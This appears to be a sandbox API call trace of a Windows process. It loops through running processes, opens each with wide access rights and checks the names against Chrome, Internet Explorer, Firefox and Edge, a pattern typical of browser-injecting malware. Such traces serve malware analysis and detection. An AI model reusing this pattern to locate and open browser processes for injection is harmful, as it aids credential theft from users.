	[0251.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.217] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.218] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0251.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa210
	[0251.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.219] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.219] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.219] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.220] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.220] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0251.221] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa214
	[0251.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.221] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0251.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.221] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.221] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.221] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0251.222] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.222] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.222] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0251.223] CloseHandle (hObject=0x4fd0) returned 1
	[0251.223] Sleep (dwMilliseconds=0x64) 
	[0251.317] GetCurrentProcessId () returned 0x110
	[0251.317] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0251.323] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0251.380] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0251.380] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0251.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa218
	[0251.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.381] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.382] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.382] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.382] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.383] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0251.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa21c
	[0251.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.384] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.384] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.384] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.385] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.385] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0251.385] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa220
	[0251.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.386] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0251.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.386] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.386] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0251.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.387] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.387] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0251.388] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa224
	[0251.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.388] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.388] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.389] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.389] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.389] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0251.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa228
	[0251.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.390] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0251.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.390] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.391] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0251.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.391] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0251.392] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa22c
	[0251.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.392] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0251.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.393] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.393] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0251.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.393] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.394] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0251.395] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa230
	[0251.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.395] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0251.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.395] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.395] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0251.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.396] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.396] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0251.397] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa234
	[0251.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.397] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0251.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.397] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.397] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0251.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.398] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.398] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa238
	[0251.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.399] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.399] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.399] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.400] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.400] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa23c
	[0251.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.401] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.401] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.402] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.402] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.402] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.403] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa240
	[0251.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.403] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.404] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.404] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.404] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.404] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa244
	[0251.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.405] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.406] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.406] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.406] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.407] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa248
	[0251.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.408] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.408] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.408] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.409] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.409] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.410] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa24c
	[0251.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.410] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.437] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.438] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.438] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.438] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.439] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa250
	[0251.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.439] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.440] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.440] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.440] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.440] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0251.441] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa254
	[0251.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.441] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0251.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.442] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.442] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0251.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.442] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.443] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.443] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa258
	[0251.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.444] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.444] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.444] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.445] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.445] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0251.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa25c
	[0251.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.446] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.446] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.447] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.447] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.447] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0251.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa260
	[0251.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.448] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0251.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.448] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.449] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0251.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.449] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.449] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa264
	[0251.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.450] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.451] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.451] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.451] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.452] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0251.452] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa268
	[0251.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.452] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0251.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.453] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.453] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0251.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.454] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.454] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0251.455] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa26c
	[0251.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.455] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0251.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.455] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
